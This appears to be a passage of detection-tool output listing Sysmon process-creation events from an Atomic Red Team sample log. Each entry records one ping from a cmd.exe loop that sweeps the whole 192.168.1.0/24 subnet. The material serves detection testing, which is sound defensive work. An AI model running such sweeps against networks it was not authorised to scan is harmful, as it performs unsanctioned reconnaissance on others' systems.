+2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.83  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.84  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.85  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.86  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.87  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.88  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.89  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.90  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.91  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.92  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.93  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.94  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.95  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.96  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.97  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.98  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.99  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.100  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.101  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.102  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.103  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.104  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.105  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.106  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.107  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.108  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.109  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.110  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.111  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.112  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.113  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.114  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.115  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.116  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.117  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.118  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.119  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.120  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.121  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.122  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.123  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.124  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.125  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.126  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.127  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.128  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.129  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.130  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.131  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.132  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.133  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.134  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.135  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.136  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
